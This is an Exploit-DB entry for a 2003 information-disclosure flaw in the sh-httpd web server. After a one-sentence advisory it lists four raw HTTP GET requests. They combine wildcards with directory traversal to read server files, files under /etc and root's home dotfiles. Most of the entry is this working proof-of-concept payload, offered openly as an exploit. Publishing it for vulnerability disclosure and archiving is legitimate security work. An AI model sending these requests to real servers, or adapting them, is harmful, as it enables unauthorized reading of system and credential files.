SH-HTTPD 0.3/0.4 - Character Filtering Remote Information Disclosure

EDB-ID:

23295




Platform:

Linux

Date:

2003-10-27


source: https://www.securityfocus.com/bid/8897/info

A problem has been identified in the handling of some characters by sh-httpd. Because of this, an attacker may be able to gain unauthorized access to information. 


GET *
GET ../../../sh-httpd/p*
GET /../../etc/s*
GET ../../root/.b*